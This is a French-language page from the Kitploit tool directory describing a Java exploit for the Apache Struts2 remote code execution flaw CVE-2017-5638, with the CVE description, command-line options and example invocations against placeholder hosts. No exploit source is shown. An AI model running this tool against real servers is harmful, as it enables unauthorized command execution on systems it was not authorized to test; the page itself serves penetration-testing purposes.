Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
struts2_cve-2017-5638 — Exploit basé sur Java pour Apache Struts2 CVE-2017-5638, exécutant des commandes arbitraires via des en-têtes HTTP spécialement conçus. Destiné aux évaluations de sécurité autorisées. | Kitploit
Outils/GitHubGitHub/m3ssap0/struts2_cve-2017-5638
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed Teaming
GitHubm3ssap0/struts2_cve-2017-5638

struts2_cve-2017-5638

Exploit basé sur Java pour Apache Struts2 CVE-2017-5638, exécutant des commandes arbitraires via des en-têtes HTTP spécialement conçus. Destiné aux évaluations de sécurité autorisées.

Voir le dépôt
11il y a 8 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

struts2_cve-2017-5638

Il s'agit d'une sorte de portage Java de l'exploit Python disponible à l'adresse : https://www.exploit-db.com/exploits/41570/.

Ce logiciel est écrit sans dépendances externes.

AVERTISSEMENT

Cet outil est destiné aux ingénieurs sécurité et aux professionnels de la sécurité applicative (AppSec) pour des évaluations de sécurité. Veuillez utiliser cet outil de manière responsable. Je n'assume aucune responsabilité quant à la manière dont cet outil est utilisé. Je ne suis PAS responsable des dommages causés ou des crimes commis en utilisant cet outil.

Informations sur la vulnérabilité

  • CVE-ID : CVE-2017-5638
  • Lien : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638
  • Description : Le parseur Jakarta Multipart d'Apache Struts 2 2.3.x avant 2.3.32 et 2.5.x avant 2.5.10.1 présente une gestion des exceptions incorrecte et une génération de messages d'erreur incorrecte lors des tentatives de téléversement de fichiers, ce qui permet à des attaquants distants d'exécuter des commandes arbitraires via un en-tête HTTP Content-Type, Content-Disposition ou Content-Length falsifié, comme cela a été exploité activement en mars 2017 avec un en-tête Content-Type contenant une chaîne #cmd=.

Aide

root@kitploit:~
Usage:
   java -jar struts2_cve-2017-5638.jar [options]
Description:
   Exploiting Apache Struts2 Remote Code Execution (CVE-2017-5638).
Options:
   -h, --help
      Prints this help and exits.
   -u, --url [target_URL]
      The target URL where the exploit will be performed.
   -cmd, --command [command_to_execute]
      The command that will be executed on the remote machine.
   --cookies [cookies]
      Optional. Cookies passed into the request, i.e. authentication cookies.
   -v, --verbose
      Optional. Increase verbosity.

Exemples

root@kitploit:~
java -jar struts2_cve-2017-5638.jar --url "https://vuln1.foo.com/asd" --command ipconfig
root@kitploit:~
java -jar struts2_cve-2017-5638.jar --url "https://vuln2.foo.com/asd" --command ipconfig --cookies "JSESSIONID=qwerty0123456789"
root@kitploit:~
java -jar struts2_cve-2017-5638.jar --url "https://vuln3.foo.com/asd" --command dir --cookies "JSESSIONID=qwerty0123456789;foo=bar"

Auteurs

  • Antonio Francesco Sardella - Portage Java - m3ssap0

Licence

Ce projet est sous licence MIT - voir le fichier LICENSE.txt pour plus de détails.

Remerciements

  • Vex Woo pour l'exploit Python original.
Télécharger l’outil